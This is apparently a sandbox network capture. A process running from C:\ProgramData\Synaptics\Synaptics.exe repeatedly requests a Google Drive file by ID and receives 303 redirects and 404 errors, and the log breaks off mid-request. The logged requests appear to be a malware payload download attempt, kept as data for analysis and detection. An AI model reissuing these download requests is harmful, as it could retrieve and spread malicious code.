                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DH047w2IJKubAgVEupyO5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.7 | 59915 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:30 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:30 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5meiXpMvrWN1iWoBj4Ncap6ZIapy2pLnEw1jS2hqmvr8BttJwe2oq-JwBk1a1v9M31
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-IHEG3_KI7_Sg6CkDcqvJng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:30 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:30 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="9XcbCX9uw_gGbj7lnvq0yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:30 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                74 | 192.168.2.7 | 59912 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:30 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:30 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5hcRaotB85awLW8Jb7XJOot674Y_mSH0E6TD5_9dTf53UufXllM-jPIO9VRAC2wkxQ
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HEOajIdQRMJe3V6JNEx4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:30 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:30 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="YcGUaJ1ERAiE9P9xeLjc6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:30 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                75 | 192.168.2.7 | 59923 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4gvqIdAY5qXbnm3yY6QFo_usM9aZdJVyCzZHgC0mUvH1l8Ba6mToMWsrOJ8xiicUvk0b5nXbQ
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jl884KnxyVBC5Azazuj8IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:31 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:31 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="wNXhUxC3gsQWnuIDChwF4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:31 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                76 | 192.168.2.7 | 59924 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:31 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Jpc_lvlRMo7I_JrtWxtWhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                77 | 192.168.2.7 | 59922 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:31 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-a6rQnn2Y62CYTEIai1Eojg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                78 | 192.168.2.7 | 59925 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:31 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC45Qb11Lwljhb8x2ZM9OZhtyf_Ooo5vtuaum_Ai-ydoPt8hfG8_wa2pyH6rpEws7aHP
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:31 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XhW0vGcxCfp9wO0lv8i5uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:31 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:31 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="P0RbrVQE8L2tSm9luqxnXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:31 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.7 | 59934 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:32 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3WqLIA03PK7FEutCyWVvQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.7 | 59937 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:32 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6v0aWumbYDI7cKsNkYfKAbN5h37_jaMKOjWdXEWLyZqCE8qwjSo1vRwEohIeOUIfHLceFn2LI
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-15_EIfn6xll7z5W-1tyo5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:32 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:32 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="BMD_x5OVKe4PE0-vJD17XA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:32 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.7 | 59933 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:32 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:32 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Lryqvmx_xBM5eJK9ktUh-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.7 | 59941 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
